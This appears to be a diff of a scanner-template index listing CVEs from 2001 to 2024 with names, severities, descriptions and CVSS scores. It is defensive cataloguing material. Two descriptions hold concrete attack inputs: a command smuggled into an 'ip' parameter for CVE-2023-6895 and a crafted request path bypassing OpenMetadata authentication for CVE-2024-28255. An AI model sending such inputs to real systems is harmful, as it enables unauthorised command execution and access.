{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"}
|
||||
{"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"}
|
||||
|
@ -2201,7 +2218,7 @@
|
|||
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
|
||||
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
|
||||
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
|
||||
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
|
||||
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
|
||||
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
|
||||
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
|
||||
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
|
||||
|
@ -2250,6 +2267,7 @@
|
|||
{"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"}
|
||||
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
|
||||
{"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"}
|
||||
{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"high","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"}
|
||||
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
|
||||
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
|
||||
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
|
||||
|
@ -2278,31 +2296,34 @@
|
|||
{"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"}
|
||||
{"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"}
|
||||
{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"}
|
||||
{"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"high","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"}
|
||||
{"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"}
|
||||
{"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"}
|
||||
{"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"}
|
||||
{"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"}
|
||||
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
|
||||
{"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"}
|
||||
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
|
||||
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
|
||||
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
|
||||
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
|
||||
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
|
||||
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
|
||||
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
|
||||
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
|
||||
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
||||
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
||||
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
||||
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
|
||||
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
|
||||
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
|
||||
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
|
||||
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
||||
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
|
||||
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
|
||||
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
||||
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
|
||||
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
|
||||
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
|
||||
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
|
||||
{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"}
|
||||
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
|
||||
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
|
||||
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
|
||||
{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
|
||||
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
|
||||
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
|
||||
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
|
||||
|
@ -2317,6 +2338,12 @@
|
|||
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
|
||||
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
|
||||
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
|
||||
{"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"}
|
||||
{"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"}
|
||||
{"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"}
|
||||
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
|
||||
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
|
||||
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
|
||||
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
|
||||
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
|
||||
